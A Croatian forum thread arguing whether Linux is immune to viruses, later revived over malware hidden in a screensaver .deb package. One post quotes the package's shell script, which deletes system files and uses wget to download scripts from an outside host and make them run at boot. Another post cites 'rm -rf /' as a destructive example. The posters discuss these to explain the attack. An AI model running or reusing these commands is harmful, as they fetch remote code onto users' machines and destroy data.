Propust u Windowsima 7

a tko cijelo vrijeme razvlači linux po temi? brat ili mama?

@slepix

ako je tih 800 virusa napisanih puno na 0.94% zašto onda po toj propocionalnoj analogiji ovdje na bug forumu koji kaže da ima 4% korisnika linuxa i još 24% ljudi koristi i windows i linux nema tema : "help, zaražen sam linux virusom! " , a znamo da na win podforumu takve teme niču kao gljive poslije kiše.  to je zato jer tih 800 virusa nikad nije zaživjelo, jer je teško sakrit binarni file u open sourceu.

a što se tiče analogije s autom, može se reći i da je kriv i proizvođač auta, jer nije ugradio kontorlu goriva koje koristi pa ga je lako nadmudrit. a kriva je i benziska crpka, jer na pištolju nema kontorlu kvalitete goriva i omogućuje malverzaciju. dokle god ne dobiješ labaratorijski nalaz nikad nećeš znati kakvo si gorivo nasuo. a isprintani labaratorijski nalaz je open source kod.  :) (al ga i ja sad ser....)

kuzo je na prvoj stranici prvi spomenio linux. ja sam o linuxu replicirao slepixu koji ga je također spomenio prije mene i sve smo lijepo argumentirali. sve pet, sve civilizirano, sve do tvog "lame" komentara. 

i poceo je flame..ja sam zavrsio sa ovom temom. Pozdrav

znam da je dizanje teme iz mrtvih, ali nazalost pocinje ono sto sam tvrdio u ovom threadu, cim linux naraste, krenuti ce i virusi : http://linux.slashdot.org/story/09/12/09/2215253/Malware-Found-Hidden-In-Screensaver-On-Gnome-Look ...i to na istu spiku kao i na windozama...screen saver :(

da si malo bolje pročitao znao bi da je ovo čisti socijalni inžinjering ... kao da ja tebi kažem ajde obriši disk i to napraviš i kažeš "vau, novi virus" . lik je instalirao .deb paket van repozitorija. dakle taj .deb paket je mogao sastaviti bilo tko. i onda ga je lik pokrenio s admin ovlastima. a u tom paketu je bila skripta:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

koja kaže da obriše neke fileove, neke skine i doda im pravo izvođenja prilikom dizanja sustava. krajnji cilj je bio pinganje wwowned.com što se naravno može promijenit u bilo šta. poanta - svi paketi van repozitorija mogu biti potencijalno opasni ako je izvor nepovjerljiv. ovo nije virus.

svatko može napraviti skriptu s komandom npr. (nemojte ovo pokretati kao root!) "rm -rf /" i opla, ode cijeli sistem. to spakirat kao .deb i ponuditi za download.

ne znam kako da ti kažem da ovo nije virus. netko je spakirao skriptu koja nešto radi u .deb i promijenio ime u skreensaver. netko je to skinio i pokrenio kao admin. greška, nije ju trebao pokretati kao admin. da to nije napravio ništa se ne bi desilo. i to je to. ti hoćeš reći i da se na linuxu može promijeniti ime nekog filea, da se može napraviti vlastiti deb paket sa bilo kojom sadržanom komandom unutra ... pa u biti u pravu si  

istaliranje softwarea s nepovjerljivih izvora kao root doista jeste manira koja se često vidi na windowsima. ovo je problem samo onogo što se nalazi između stolice i računala. ne iskorištava se nikakva rupa u sustavu ili slično kao kod  virusa. ovo je kao da si ostavio ključ u vratima auta i onda plačeš proizvođaču kako mu se lako provaljuje u auto.

na googleu pod upit "computer virus wiki" mi izbaci sljedeće:

"Računalni virus je program koji može "inficirati" druge programe tako da u njih unese kopiju samog sebe (koja može biti modificirana). Virus se može proširiti računalnim sustavom ili mrežom koristeći se ovlastima korisnika koji su inficirani. Svaki program koji je inficiran postaje virus i tako infekcija raste .

Računalni virus se obično sastoji od dva dijela

Prvi dio je kod koji omogućava razmnožavanje virusa

Drugi dio je korisni teret (payload) koji može biti bezopasan ili opasan."

Ova skripta koju je žrtva pokrenila kao root ne inficira druge programe da u njih unese samog sebe. ne širi se računalnim sustavom tj. ne razmožava se.